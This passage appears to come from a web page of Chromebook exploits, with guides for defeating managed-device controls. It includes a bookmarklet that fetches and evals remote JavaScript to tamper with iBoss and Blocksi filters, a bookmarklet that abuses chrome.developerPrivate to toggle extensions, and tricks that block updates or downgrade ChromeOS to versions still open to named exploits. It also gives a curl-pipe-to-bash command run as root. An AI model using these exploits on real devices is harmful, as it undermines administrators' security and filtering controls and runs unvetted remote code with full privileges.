<li>I recommend doing soft disable, which only disables it until restart. </li>
<li>The idea was from <a href="https://bolg.glitch.me/_/point-blank/">Bypassi#7037</a></li>
</ul>
<h2 id="uboss-tamper-with-iboss">UBoss <em>Tamper with IBoss</em></h2>
<p>This works only for iBoss, and Blocksi, If you don't have one of these, use New Point Blank.</p>
<h3 id="requirements-2">Requirements</h3>
<ul>
<li>Bookmarklets enabled</li>
<li>Access to a working brain</li>
</ul>
<h3 id="getting-started-1">Getting started</h3>
<ol>
<li>Go to the corresponding link for your blocker below.</li>
</ol>
<p>iBoss: <a href="https://tinyurl.com/byeswamp">tinyurl.com/byeswamp</a></p>
<p>Blocksi: <a href="https://tinyurl.com/blockboss">tinyurl.com/blockboss</a></p>
<p>Then bookmark the code below:</p>
<pre><code class="language-js">javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
</code></pre>
<ol start="2">
<li>Then go to the site with your blocker that was listed above.</li>
<li>Run the code. Follow the instructions there.</li>
</ol>
<p>If it doesn't work let us know by creating a discussion, this was made in partnership with <code class="normlcode">akabutnice</code> and <code class="normlcode">bypassi</code>.</p>
<h2 id="caub-prevent-updates">CAUB <em>Prevent Updates</em></h2>
<p>This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your Chromebook that the WiFi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.</p>
<h3 id="requirements-3">Requirements</h3>
<ul>
<li>Access to <code class="normlcode">chrome://network#state</code></li>
</ul>
<h3 id="getting-started-2">Getting started</h3>
<ol>
<li>Go to <code class="normlcode">chrome://network#state</code>.</li>
<li>Scroll to the bottom of the page. You will see a list of WiFi that you have connected to before.</li>
<li>Click the <code class="normlcode">+</code> sign next to the WiFi name of each network that you commonly connect your Chromebook to.</li>
<li>We are going to make it so that when the Chromebook is connected to those networks, it will not check for updates.</li>
<li>Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.</li>
<li>Go to <a href="./caub.html">./caub.html</a>.</li>
<li>Paste the copied text into the textbox below.</li>
<li>Press the <code class="normlcode">generate onc</code> button below the textbox.</li>
<li>Once you have downloaded the file, go to <code class="normlcode">chrome://network#general</code>.</li>
<li>Click on the <code class="normlcode">import ONC</code> button.</li>
<li>Import the newly downloaded file.</li>
</ol>
<p><strong>Extra notes</strong></p>
<ul>
<li>Your Chromebook will no longer automatically update. (as long as you are on a wifi that you CAUBed)</li>
<li>Be careful not to stay on wifi for too long without using CAUB on it, otherwise, you might update.</li>
<li>We cannot guarantee that this will work on every wifi, but it should work on most.</li>
</ul>
<h2 id="caub-flags-prevent-updates">CAUB Flags <em>Prevent Updates</em></h2>
<p>This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by <a href="https://github.com/MechaXYZ">MechaXYZ</a>. Using a Chrome flag, you can convince your Chromebook not to automatically update.</p>
<h3 id="requirements-4">Requirements</h3>
<ul>
<li>Access to <code class="normlcode">chrome://flags</code></li>
</ul>
<h3 id="getting-started-3">Getting started</h3>
<ol>
<li>Go to <code class="normlcode">chrome://flags#show-metered-toggle</code> or search "metered" in <code class="normlcode">chrome://flags</code> instead.</li>
<li>Enable it and restart your device.</li>
<li>Open the Settings app.</li>
<li>Go to your Network >> Advanced >> Show metered toggle and turn it on</li>
</ol>
<p><strong>Extra notes</strong></p>
<ul>
<li>Your Chromebook will no longer automatically update. (as long as you have the flag enabled)</li>
<li>And you must be able to enable flags if it ain't blocked otherwise, this exploit won't work</li>
</ul>
<h2 id="blank3r">Blank3r</h2>
<p>Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.</p>
<h3 id="requirements-5">Requirements</h3>
<ul>
<li>Bookmarklets enabled</li>
</ul>
<h3 id="getting-started-4">Getting started</h3>
<ol>
<li>Bookmark this code:</li>
</ol>
<pre><code class="language-js">javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
</code></pre>
<ol start="2">
<li>Navigate to <code class="normlcode">chrome://extensions</code>.</li>
<li>Click on an extension that YOU installed from the Chrome Web Store > Details.</li>
<li>In the URL bar, copy the string of letters and numbers after the <code class="normlcode">/?id=</code>.</li>
<li>Click "View in Chrome Web Store" and spam the escape key. If it loads into Chrome Webstore try again, if it is a blank screen click the bookmarklet.</li>
<li>Paste the ID of the extension into the prompt separated by commas.</li>
</ol>
<p>If you close the tab, the exploit will stop working.</p>
<h2 id="downgrading-change-versions">Downgrading <em>Change versions</em></h2>
<p>Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF, SH1MMER, or CryptoSmite. This is a built-in feature of ChromeOS.</p>
<p>Please do note that depending on your <code class="normlcode">kernver=</code> you may not be able to downgrade to certain versions. More info is at the <a href="#finding-kernver">Finding Kernver</a> section.</p>
<h3 id="requirements-6">Requirements</h3>
<ul>
<li>A USB thumb drive with at least 8GB of storage, however 16GB (or more) is recommended.</li>
<li>A personal computer with access to downloading the Chromebook Recovery Utility.</li>
</ul>
<h3 id="setup">Setup</h3>
<ol>
<li>Navigate to <code class="normlcode">chrome://version</code> on the Chromebook you wish to downgrade. If that is blocked try <code class="normlcode">chrome://system/:~:text=CHROMEOS_RELEASE_DESCRIPTION</code>, and check for your board under <code class="normlcode">Platform</code>. For me, that would be octopus.</li>
</ol>
<p><img src="./assets/chromeos-check-board.png" alt="chrome://version"></p>
<ol start="2">
<li>Navigate to <a href="https://chrome100.dev/">chrome100.dev</a> , press <code class="normlcode">ctrl+f</code> and type in your board.</li>
<li>Find and download the Chrome version you want to your personal computer.</li>
</ol>
<h3 id="downgrading">Downgrading</h3>
<ol>
<li>Install <a href="https://chromewebstore.google.com/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm">Chromebook Recovery Utility</a> onto your personal computer.</li>
<li>Open the extension, click on the settings button in the top right-hand corner, and click "Use local image".</li>
<li>Select the recovery image you downloaded from chrome100.</li>
<li>Plug in the USB you wish to use, and follow the prompts on the screen.</li>
<li>On your Chromebook, press esc+reload+power and follow the prompts.</li>
<li>On the checking for updates screen or Wi-Fi selection screen, press <code class="normlcode">ctrl</code>+<code class="normlcode">alt</code>+<code class="normlcode">e</code> to skip the "checking for updates" screen.</li>
</ol>
<h2 id="pollen-policy-editor">Pollen <em>Policy Editor</em></h2>
<p>chromeOS User Policy Editor</p>
<h3 id="requirements-7">Requirements</h3>
<ul>
<li>Devmode <strong>NEEDS</strong> to be enabled.</li>
</ul>
<h3 id="getting-started-5">Getting started</h3>
<p>There are two modes for this, I recommend just using the first one.</p>
<h4 id="normal">Normal</h4>
<ol>
<li>Open Crosh (Ctrl+Alt+T)</li>
<li>Run the following commands:</li>
</ol>
<pre><code class="language-sh">shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
</code></pre>